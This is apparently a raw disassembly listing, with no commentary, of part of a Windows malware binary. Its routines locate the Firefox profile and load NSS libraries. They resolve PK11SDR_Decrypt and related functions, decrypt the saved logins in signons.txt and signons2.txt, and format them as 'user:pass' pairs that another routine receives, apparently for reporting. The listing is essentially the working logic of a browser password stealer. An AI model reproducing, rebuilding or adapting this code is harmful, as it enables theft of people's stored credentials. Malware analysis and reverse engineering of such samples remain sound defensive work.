loc_40618F: ; CODE XREF: sub_406140+39�j
pop edi
pop esi
pop ebx
retn
sub_406140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406193 proc near ; CODE XREF: sub_406676+63�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push esi
call dword_4C41BC
mov esi, eax
test esi, esi
jz short loc_4061E3
push 0
push 1
push esi
call dword_4C45C8
add esp, 0Ch
test eax, eax
jnz short loc_4061E3
mov eax, [ebp+arg_0]
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call dword_4C45C0
add esp, 0Ch
test eax, eax
jz short loc_4061E7
loc_4061E3: ; CODE XREF: sub_406193+11�j
; sub_406193+23�j
xor eax, eax
jmp short loc_406202
; ---------------------------------------------------------------------------
loc_4061E7: ; CODE XREF: sub_406193+4E�j
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_8]
mov [eax], ecx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_4]
push esi
mov [eax], ecx
call dword_4C45C4
xor eax, eax
pop ecx
inc eax
loc_406202: ; CODE XREF: sub_406193+52�j
pop esi
leave
retn
sub_406193 endp
; =============== S U B R O U T I N E =======================================
sub_406205 proc near ; CODE XREF: sub_406231+E3�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_40D630
xor edx, edx
test eax, eax
pop ecx
jle short loc_40622F
loc_406217: ; CODE XREF: sub_406205+28�j
mov cl, [edx+esi]
cmp cl, 41h
jl short loc_40622A
cmp cl, 5Ah
jg short loc_40622A
add cl, 20h
mov [edx+esi], cl
loc_40622A: ; CODE XREF: sub_406205+18�j
; sub_406205+1D�j
inc edx
cmp edx, eax
jl short loc_406217
loc_40622F: ; CODE XREF: sub_406205+10�j
pop esi
retn
sub_406205 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406231 proc near ; CODE XREF: sub_4069DE+1�p
var_64C = dword ptr -64Ch
var_63C = byte ptr -63Ch
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_137 = byte ptr -137h
var_34 = byte ptr -34h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 63Ch
and [ebp+var_138], 0
push esi
push edi
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_137]
rep stosd
stosw
stosb
push 8
pop ecx
mov esi, offset aApplicationDat ; "Application Data\\Mozilla\\Firefox"
lea edi, [ebp+var_34]
rep movsd
lea eax, [ebp+var_C]
movsb
push eax
xor edi, edi
push 8
mov [ebp+var_10], 104h
mov [ebp+var_4], edi
call dword_4190F4 ; GetCurrentProcess
push eax
call dword_4C47C8
test eax, eax
jz short loc_4062FD
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_C]
call dword_4C47E0
test eax, eax
jz short loc_4062FD
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_23C]
push eax
call sub_40D8A0
mov esi, offset asc_41A0E0 ; "\\"
lea eax, [ebp+var_23C]
push esi
push eax
call sub_40D8B0
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_23C]
push eax
call sub_40D8B0
lea eax, [ebp+var_23C]
push offset aProfiles_ini ; "\\profiles.ini"
push eax
call sub_40D8B0
lea eax, [ebp+var_23C]
push offset aR_0 ; "r"
push eax
call sub_40E8E4
add esp, 28h
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_406304
loc_4062FD: ; CODE XREF: sub_406231+51�j
; sub_406231+69�j
xor eax, eax
jmp loc_406421
; ---------------------------------------------------------------------------
loc_406304: ; CODE XREF: sub_406231+CA�j
push ebx
push eax
mov ebx, 400h
jmp short loc_406354
; ---------------------------------------------------------------------------
loc_40630D: ; CODE XREF: sub_406231+135�j
lea eax, [ebp+var_63C]
push eax
call sub_406205
cmp [ebp+var_4], 0
pop ecx
lea eax, [ebp+var_63C]
jnz short loc_406340
push offset aNameDefault ; "name=default"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_406351
mov [ebp+var_4], 1
jmp short loc_406351
; ---------------------------------------------------------------------------
loc_406340: ; CODE XREF: sub_406231+F3�j
push offset aPath ; "path="
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_40636D
loc_406351: ; CODE XREF: sub_406231+104�j
; sub_406231+10D�j
push [ebp+var_8]
loc_406354: ; CODE XREF: sub_406231+DA�j
lea eax, [ebp+var_63C]
push ebx
push eax
call sub_40EA36
add esp, 0Ch
test eax, eax
jnz short loc_40630D
jmp loc_406415
; ---------------------------------------------------------------------------
loc_40636D: ; CODE XREF: sub_406231+11E�j
lea eax, [ebp+var_63C]
push offset asc_41A0AC ; "/"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_406387
mov byte ptr [eax], 5Ch
loc_406387: ; CODE XREF: sub_406231+151�j
lea eax, [ebp+var_63C]
push eax
call sub_40D630
lea ecx, [ebp+var_63C]
dec ecx
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_63C]
mov [esp+64Ch+var_64C], offset asc_41A0B4 ; "="
push eax
call sub_40D810
mov ebx, eax
push ebx
call sub_40D630
mov edi, eax
lea eax, [ebp+var_34]
push eax
call sub_40D630
add edi, eax
lea eax, [ebp+var_138]
push eax
call sub_40D630
lea eax, [edi+eax+3]
push eax
call sub_40E74F
mov edi, eax
add esp, 18h
test edi, edi
jz short loc_406415
lea eax, [ebp+var_138]
push eax
push edi
call sub_40D8A0
push esi
push edi
call sub_40D8B0
lea eax, [ebp+var_34]
push eax
push edi
call sub_40D8B0
push esi
push edi
call sub_40D8B0
inc ebx
push ebx
push edi
call sub_40D8B0
add esp, 28h
loc_406415: ; CODE XREF: sub_406231+137�j
; sub_406231+1B2�j
push [ebp+var_8]
call sub_40E8F7
pop ecx
mov eax, edi
pop ebx
loc_406421: ; CODE XREF: sub_406231+CE�j
pop edi
pop esi
leave
retn
sub_406231 endp
; =============== S U B R O U T I N E =======================================
sub_406425 proc near ; CODE XREF: sub_4069DE+1A�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebp, ebp
cmp esi, ebp
push edi
mov dword_4C45E0, ebp
mov dword_4C45DC, ebp
mov edi, offset aPlc4_dll ; "plc4.dll"
mov ebx, offset aNss3_dll ; "nss3.dll"
jz short loc_4064A4
push offset aNspr4_dll ; "nspr4.dll"
push esi
call sub_40600B
test eax, eax
pop ecx
pop ecx
jz short loc_40649C
push edi
push esi
call sub_40600B
cmp eax, ebp
pop ecx
pop ecx
mov dword_4C45E0, eax
jz short loc_40649C
push offset aPlds4_dll ; "plds4.dll"
push esi
call sub_40600B
test eax, eax
pop ecx
pop ecx
jz short loc_40649C
push offset aSoftokn3_dll ; "softokn3.dll"
push esi
call sub_40600B
test eax, eax
pop ecx
pop ecx
jz short loc_40649C
push ebx
push esi
call sub_40600B
pop ecx
pop ecx
mov dword_4C45DC, eax
loc_40649C: ; CODE XREF: sub_406425+33�j
; sub_406425+45�j ...
cmp dword_4C45DC, ebp
jnz short loc_4064D3
loc_4064A4: ; CODE XREF: sub_406425+22�j
push ebx
push esi
call sub_40600B
push edi
push esi
mov dword_4C45DC, eax
call sub_40600B
add esp, 10h
cmp dword_4C45DC, ebp
mov dword_4C45E0, eax
jz loc_4065AB
cmp eax, ebp
jz loc_4065AB
loc_4064D3: ; CODE XREF: sub_406425+7D�j
mov esi, dword_4190F8
push offset aNss_init ; "NSS_Init"
push dword_4C45DC
call esi ; GetProcAddress
push offset aNss_shutdown ; "NSS_Shutdown"
push dword_4C45DC
mov dword_4C45CC, eax
call esi ; GetProcAddress
push offset aPk11_getintern ; "PK11_GetInternalKeySlot"
push dword_4C45DC
mov dword_4C45D0, eax
call esi ; GetProcAddress
push offset aPk11_freeslot ; "PK11_FreeSlot"
push dword_4C45DC
mov dword_4C41BC, eax
call esi ; GetProcAddress
push offset aPk11_authentic ; "PK11_Authenticate"
push dword_4C45DC
mov dword_4C45C4, eax
call esi ; GetProcAddress
push offset aPk11sdr_decryp ; "PK11SDR_Decrypt"
push dword_4C45DC
mov dword_4C45C8, eax
call esi ; GetProcAddress
push offset aPk11_checkuser ; "PK11_CheckUserPassword"
push dword_4C45DC
mov dword_4C45C0, eax
call esi ; GetProcAddress
cmp dword_4C45CC, ebp
mov dword_4C45D4, eax
jz short loc_4065A6
cmp dword_4C45D0, ebp
jz short loc_4065A6
cmp dword_4C41BC, ebp
jz short loc_4065A6
cmp dword_4C45C8, ebp
jz short loc_4065A6
cmp dword_4C45C0, ebp
jz short loc_4065A6
cmp dword_4C45C4, ebp
jz short loc_4065A6
cmp eax, ebp
jz short loc_4065A6
push offset aPl_base64decod ; "PL_Base64Decode"
push dword_4C45E0
call esi ; GetProcAddress
cmp eax, ebp
mov dword_4C19B0, eax
jz short loc_4065A6
xor eax, eax
inc eax
jmp short loc_4065AD
; ---------------------------------------------------------------------------
loc_4065A6: ; CODE XREF: sub_406425+138�j
; sub_406425+140�j ...
call sub_405FD6
loc_4065AB: ; CODE XREF: sub_406425+A0�j
; sub_406425+A8�j
xor eax, eax
loc_4065AD: ; CODE XREF: sub_406425+17F�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_406425 endp
; =============== S U B R O U T I N E =======================================
sub_4065B2 proc near ; CODE XREF: sub_4069DE+2A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_0]
and dword_4C45D8, 0
call dword_4C45CC
test eax, eax
pop ecx
jz short loc_4065D0
call sub_405FD6
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4065D0: ; CODE XREF: sub_4065B2+14�j
push ebx
mov ebx, [esp+4+arg_4]
test ebx, ebx
push esi
mov dword_4C45D8, 1
mov esi, offset byte_4C41C0
jz short loc_406616
push ebx
call sub_40D630
cmp eax, 3FFh
pop ecx
jbe short loc_406600
loc_4065F7: ; CODE XREF: sub_4065B2+75�j
call sub_405FD6
xor eax, eax
jmp short loc_406629
; ---------------------------------------------------------------------------
loc_406600: ; CODE XREF: sub_4065B2+43�j
push ebx
call sub_40D630
test eax, eax
pop ecx
jbe short loc_406616
push ebx
push esi
call sub_40D8A0
pop ecx
pop ecx
jmp short loc_40661D
; ---------------------------------------------------------------------------
loc_406616: ; CODE XREF: sub_4065B2+35�j
; sub_4065B2+57�j
and byte_4C41C0, 0
loc_40661D: ; CODE XREF: sub_4065B2+62�j
push esi
call sub_406079
cmp eax, 1
pop ecx
jnz short loc_4065F7
loc_406629: ; CODE XREF: sub_4065B2+4C�j
pop esi
pop ebx
retn
sub_4065B2 endp
; =============== S U B R O U T I N E =======================================
sub_40662C proc near ; CODE XREF: sub_406761+A7�p
; sub_406761+11F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
and byte ptr [edi], 0
jmp short loc_40665C
; ---------------------------------------------------------------------------
loc_406639: ; CODE XREF: sub_40662C+3A�j
cmp eax, 0Ah
jz short loc_40666D
cmp eax, 0Dh
jz short loc_40665C
xor ecx, ecx
loc_406645: ; CODE XREF: sub_40662C+2E�j
test al, al
jz short loc_40665C
cmp esi, [esp+8+arg_4]
jge short loc_406668
mov [esi+edi], al
inc esi
shr eax, 8
inc ecx
cmp ecx, 4
jl short loc_406645
loc_40665C: ; CODE XREF: sub_40662C+B�j
; sub_40662C+15�j ...
call sub_4060F4
movsx eax, al
test eax, eax
jnz short loc_406639
loc_406668: ; CODE XREF: sub_40662C+21�j
xor eax, eax
loc_40666A: ; CODE XREF: sub_40662C+48�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40666D: ; CODE XREF: sub_40662C+10�j
and byte ptr [esi+edi], 0
xor eax, eax
inc eax
jmp short loc_40666A
sub_40662C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406676 proc near ; CODE XREF: sub_406761+1D7�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_0]
mov al, [esi]
cmp al, bl
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
jnz short loc_4066AC
push 1
call sub_40E74F
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [eax], bl
xor eax, eax
inc eax
jmp loc_40675D
; ---------------------------------------------------------------------------
loc_4066AC: ; CODE XREF: sub_406676+1D�j
cmp al, 7Eh
push edi
jz short loc_40671B
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_406140
add esp, 0Ch
test eax, eax
jz short loc_406700
cmp [ebp+var_4], ebx
jz short loc_406700
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_C]
push [ebp+var_4]
call sub_406193
add esp, 10h
test eax, eax
jz short loc_406700
cmp [ebp+var_8], ebx
jz short loc_406700
mov esi, [ebp+var_10]
lea eax, [esi+1]
push eax
call sub_40E74F
cmp eax, ebx
mov edi, [ebp+arg_4]
pop ecx
mov [edi], eax
jnz short loc_406704
loc_406700: ; CODE XREF: sub_406676+4E�j
; sub_406676+53�j ...
xor eax, eax
jmp short loc_40675C
; ---------------------------------------------------------------------------
loc_406704: ; CODE XREF: sub_406676+88�j
push esi
push [ebp+var_8]
push eax
call sub_40E3A0
mov eax, [edi]
add esp, 0Ch
mov [esi+eax], bl
loc_406716: ; CODE XREF: sub_406676+CC�j
xor eax, eax
inc eax
jmp short loc_40675C
; ---------------------------------------------------------------------------
loc_40671B: ; CODE XREF: sub_406676+39�j
push offset asc_41A1D8 ; "~"
call sub_40D630
push esi
mov edi, eax
call sub_40D630
cmp eax, edi
pop ecx
pop ecx
jnz short loc_406744
push 1
call sub_40E74F
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [eax], bl
jmp short loc_406716
; ---------------------------------------------------------------------------
loc_406744: ; CODE XREF: sub_406676+BB�j
lea eax, [ebp+var_C]
push eax
push [ebp+arg_4]
add edi, esi
push edi
call sub_406140
add esp, 0Ch
neg eax
sbb eax, eax
neg eax
loc_40675C: ; CODE XREF: sub_406676+8C�j
; sub_406676+A3�j
pop edi
loc_40675D: ; CODE XREF: sub_406676+31�j
pop esi
pop ebx
leave
retn
sub_406676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406761 proc near ; CODE XREF: sub_4069DE+42�p
var_5128 = byte ptr -5128h
var_2928 = byte ptr -2928h
var_2927 = byte ptr -2927h
var_128 = byte ptr -128h
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 5128h
call sub_40D9A0
push esi
push edi
mov esi, offset aSignons_txt ; "/signons.txt"
lea edi, [ebp+var_18]
movsd
movsd
movsd
push [ebp+arg_0]
and [ebp+var_8], 0
movsb
mov esi, offset aSignons2_txt ; "/signons2.txt"
lea edi, [ebp+var_28]
movsd
movsd
movsd
movsw
xor edi, edi
inc edi
mov [ebp+var_4], edi
call sub_40D630
add eax, 41h
push eax
call sub_40E74F
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_4069DA
push [ebp+arg_0]
push esi
call sub_40D8A0
lea eax, [ebp+var_18]
push eax
push esi
call sub_40D8B0
push esi
call sub_4060C7
add esp, 14h
test eax, eax
jnz short loc_4067FB
push [ebp+arg_0]
push esi
call sub_40D8A0
lea eax, [ebp+var_28]
push eax
push esi
call sub_40D8B0
push esi
call sub_4060C7
add esp, 14h
test eax, eax
jz loc_4069DA
mov [ebp+var_4], 2
loc_4067FB: ; CODE XREF: sub_406761+6D�j
mov esi, 2800h
lea eax, [ebp+var_2928]
push esi
push eax
call sub_40662C
test eax, eax
pop ecx
pop ecx
jz loc_4069DA
cmp [ebp+var_4], edi
jnz short loc_406837
lea eax, [ebp+var_2928]
push offset a2c ; "#2c"
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4069DA
loc_406837: ; CODE XREF: sub_406761+B9�j
cmp [ebp+var_4], 2
jnz short loc_406878
lea eax, [ebp+var_2928]
push offset a2d ; "#2d"
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4069DA
jmp short loc_406878
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406761+128�j
lea eax, [ebp+var_2928]
push eax
call sub_40D630
test eax, eax
pop ecx
jz short loc_406878
cmp [ebp+var_2928], 2Eh
jz loc_4069C3
loc_406878: ; CODE XREF: sub_406761+DA�j
; sub_406761+F7�j ...
lea eax, [ebp+var_2928]
push esi
push eax
call sub_40662C
test eax, eax
pop ecx
pop ecx
jnz short loc_40685A
jmp loc_4069C3
; ---------------------------------------------------------------------------
loc_406890: ; CODE XREF: sub_406761+273�j
lea eax, [ebp+var_2928]
push eax
lea eax, [ebp+var_128]
push offset aS_5 ; "%s "
push eax
call sub_40D6BB
lea eax, [ebp+var_2928]
push esi
push eax
xor edi, edi
call sub_40662C
add esp, 14h
jmp loc_4069BB
; ---------------------------------------------------------------------------
loc_4068BF: ; CODE XREF: sub_406761+25C�j
cmp [ebp+var_2928], 2Eh
jz loc_4069C3
cmp [ebp+var_4], 2
jnz short loc_4068F3
cmp edi, 2
jnz short loc_4068F3
lea eax, [ebp+var_2928]
push eax
lea eax, [ebp+var_128]
push eax
call sub_40D8B0
pop ecx
pop ecx
xor edi, edi
jmp loc_4069AC
; ---------------------------------------------------------------------------
loc_4068F3: ; CODE XREF: sub_406761+16F�j
; sub_406761+174�j
cmp [ebp+var_2928], 2Ah
lea eax, [ebp+var_2927]
jz short loc_406908
lea eax, [ebp+var_2928]
loc_406908: ; CODE XREF: sub_406761+19F�j
push eax
lea eax, [ebp+var_5128]
push eax
call sub_40D8A0
lea eax, [ebp+var_2928]
push esi
push eax
call sub_40662C
add esp, 10h
test eax, eax
jz loc_4069C3
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2928]
push eax
call sub_406676
cmp eax, 1
pop ecx
pop ecx
jnz loc_4069DA
lea eax, [ebp+var_5128]
push eax
lea eax, [ebp+var_128]
push eax
call sub_40D8B0
lea eax, [ebp+var_128]
push offset asc_41A1DC ; ":"
push eax
call sub_40D8B0
push [ebp+var_8]
lea eax, [ebp+var_128]
push eax
call sub_40D8B0
push [ebp+arg_C]
lea eax, [ebp+var_128]
push eax
push offset dword_41E1A8
push [ebp+arg_4]
call sub_4017B6
and [ebp+var_128], 0
add esp, 28h
push 7D0h
call dword_419060 ; Sleep
and [ebp+var_8], 0
inc edi
loc_4069AC: ; CODE XREF: sub_406761+18D�j
lea eax, [ebp+var_2928]
push esi
push eax
call sub_40662C
pop ecx
pop ecx
loc_4069BB: ; CODE XREF: sub_406761+159�j
test eax, eax
jnz loc_4068BF
loc_4069C3: ; CODE XREF: sub_406761+111�j
; sub_406761+12A�j ...
lea eax, [ebp+var_2928]
push esi
push eax
call sub_40662C
test eax, eax
pop ecx
pop ecx
jnz loc_406890
loc_4069DA: ; CODE XREF: sub_406761+49�j
; sub_406761+8D�j ...
pop edi
pop esi
leave
retn
sub_406761 endp
; =============== S U B R O U T I N E =======================================
sub_4069DE proc near ; CODE XREF: sub_40198E+11EE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
call sub_406231
mov esi, eax
call sub_405E94
test esi, esi
jz short loc_4069F3
test eax, eax
jnz short loc_4069F7
loc_4069F3: ; CODE XREF: sub_4069DE+F�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4069F7: ; CODE XREF: sub_4069DE+13�j
push eax
call sub_406425
test eax, eax
pop ecx
jz short loc_406A2D
push offset byte_4C41C0
push esi
call sub_4065B2
test eax, eax
pop ecx
pop ecx
jz short loc_406A2D
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
push esi
call sub_406761
add esp, 10h
call sub_405FD6
loc_406A2D: ; CODE XREF: sub_4069DE+22�j
; sub_4069DE+33�j
xor eax, eax
inc eax
pop esi
retn
sub_4069DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A32 proc near ; CODE XREF: sub_406B93+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_406A53
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_406A53: ; CODE XREF: sub_406A32+19�j
push ebx
push esi
loc_406A55: ; CODE XREF: sub_406A32+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_406A63
cmp [ebp+var_4], eax
jnz short loc_406AAB
loc_406A63: ; CODE XREF: sub_406A32+2A�j
test edi, edi
jnz short loc_406AA0
cmp bl, 2Dh
jnz short loc_406A94
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_406A94
cmp al, 5Dh
jz short loc_406A94
cmp [ebp+var_4], edi
jnz short loc_406A94
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_406AA0
cmp bl, al
jg short loc_406AA0
mov [edx], esi
jmp short loc_406A9D
; ---------------------------------------------------------------------------
loc_406A94: ; CODE XREF: sub_406A32+38�j
; sub_406A32+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_406AA0
loc_406A9D: ; CODE XREF: sub_406A32+60�j
xor edi, edi
inc edi
loc_406AA0: ; CODE XREF: sub_406A32+33�j
; sub_406A32+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_406A55
; ---------------------------------------------------------------------------
loc_406AAB: ; CODE XREF: sub_406A32+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_406AB8
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_406AB8: ; CODE XREF: sub_406A32+7E�j
cmp edi, eax
jnz short loc_406AC1
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_406AC1: ; CODE XREF: sub_406A32+88�j
mov eax, edi
pop edi
leave
retn
sub_406A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AC6 proc near ; CODE XREF: sub_406B93+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_406AF5
; ---------------------------------------------------------------------------
loc_406AE0: ; CODE XREF: sub_406AC6+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_406AF1
cmp cl, 2Ah
jnz short loc_406AFD
cmp cl, 3Fh
jnz short loc_406AF3
loc_406AF1: ; CODE XREF: sub_406AC6+1F�j
inc dword ptr [edi]
loc_406AF3: ; CODE XREF: sub_406AC6+29�j
inc dword ptr [esi]
loc_406AF5: ; CODE XREF: sub_406AC6+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_406AE0
loc_406AFD: ; CODE XREF: sub_406AC6+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_406B0C
loc_406B02: ; CODE XREF: sub_406AC6+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_406B02
loc_406B0C: ; CODE XREF: sub_406AC6+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_406B29
cmp [eax], bl
jz short loc_406B1C
xor eax, eax
jmp short loc_406B8E
; ---------------------------------------------------------------------------
loc_406B1C: ; CODE XREF: sub_406AC6+50�j
cmp dl, bl
jnz short loc_406B29
cmp [eax], bl
jnz short loc_406B29
xor eax, eax
inc eax
jmp short loc_406B8E
; ---------------------------------------------------------------------------
loc_406B29: ; CODE XREF: sub_406AC6+4C�j
; sub_406AC6+58�j ...
push ecx
push eax
call sub_406B93
test eax, eax
pop ecx
pop ecx
jnz short loc_406B78
loc_406B36: ; CODE XREF: sub_406AC6+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_406B5A
loc_406B42: ; CODE XREF: sub_406AC6+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_406B5A
cmp [eax], bl
jz short loc_406B6F
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_406B42
loc_406B5A: ; CODE XREF: sub_406AC6+7A�j
; sub_406AC6+81�j
cmp [eax], bl
jz short loc_406B6F
push eax
push dword ptr [esi]
call sub_406B93
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_406B74
; ---------------------------------------------------------------------------
loc_406B6F: ; CODE XREF: sub_406AC6+85�j
; sub_406AC6+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_406B74: ; CODE XREF: sub_406AC6+A7�j
cmp eax, ebx
jnz short loc_406B36
loc_406B78: ; CODE XREF: sub_406AC6+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_406B8B
mov eax, [esi]
cmp [eax], bl
jnz short loc_406B8B
mov [ebp+var_4], 1
loc_406B8B: ; CODE XREF: sub_406AC6+B6�j
; sub_406AC6+BC�j
mov eax, [ebp+var_4]
loc_406B8E: ; CODE XREF: sub_406AC6+54�j
; sub_406AC6+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_406AC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B93 proc near ; CODE XREF: sub_406AC6+65�p
; sub_406AC6+9B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_406BF5
; ---------------------------------------------------------------------------
loc_406B9F: ; CODE XREF: sub_406B93+66�j
cmp eax, 1
jnz short loc_406C03
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_406C03
cmp cl, 2Ah
jz short loc_406BDE
cmp cl, 3Fh
jz short loc_406BC3
cmp cl, 5Bh
jz short loc_406BC8
xor eax, eax
cmp cl, dl
setz al
loc_406BC3: ; CODE XREF: sub_406B93+22�j
inc [ebp+arg_4]
jmp short loc_406BF1
; ---------------------------------------------------------------------------
loc_406BC8: ; CODE XREF: sub_406B93+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_406A32
mov esi, [ebp+arg_0]
jmp short loc_406BEF
; ---------------------------------------------------------------------------
loc_406BDE: ; CODE XREF: sub_406B93+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_406AC6
mov esi, [ebp+arg_0]
dec esi
loc_406BEF: ; CODE XREF: sub_406B93+49�j
pop ecx
pop ecx
loc_406BF1: ; CODE XREF: sub_406B93+33�j
inc esi
mov [ebp+arg_0], esi
loc_406BF5: ; CODE XREF: sub_406B93+A�j
mov cl, [esi]
test cl, cl
jnz short loc_406B9F
jmp short loc_406C03
; ---------------------------------------------------------------------------
loc_406BFD: ; CODE XREF: sub_406B93+73�j
cmp eax, 1
jnz short loc_406C1F
inc esi
loc_406C03: ; CODE XREF: sub_406B93+F�j
; sub_406B93+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_406BFD
cmp eax, 1
jnz short loc_406C1F
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_406C1F
cmp byte ptr [esi], 0
jnz short loc_406C1F
xor eax, eax
inc eax
jmp short loc_406C21
; ---------------------------------------------------------------------------
loc_406C1F: ; CODE XREF: sub_406B93+6D�j
; sub_406B93+78�j ...
xor eax, eax
loc_406C21: ; CODE XREF: sub_406B93+8A�j
pop esi
pop ebp
retn
sub_406B93 endp
; =============== S U B R O U T I N E =======================================
sub_406C24 proc near ; CODE XREF: sub_40198E:loc_402201�p
arg_0 = dword ptr 4
mov eax, off_41E300
cmp byte ptr [eax], 0
push esi
jz short loc_406C50
mov esi, offset off_41E300
loc_406C34: ; CODE XREF: sub_406C24+2A�j
mov eax, [esi]
push [esp+4+arg_0]
push eax
call sub_406B93
pop ecx
add esi, 4
test eax, eax
pop ecx
jnz short loc_406C54
mov eax, [esi]
cmp byte ptr [eax], 0
jnz short loc_406C34
loc_406C50: ; CODE XREF: sub_406C24+9�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_406C54: ; CODE XREF: sub_406C24+23�j
xor eax, eax
inc eax
pop esi
retn
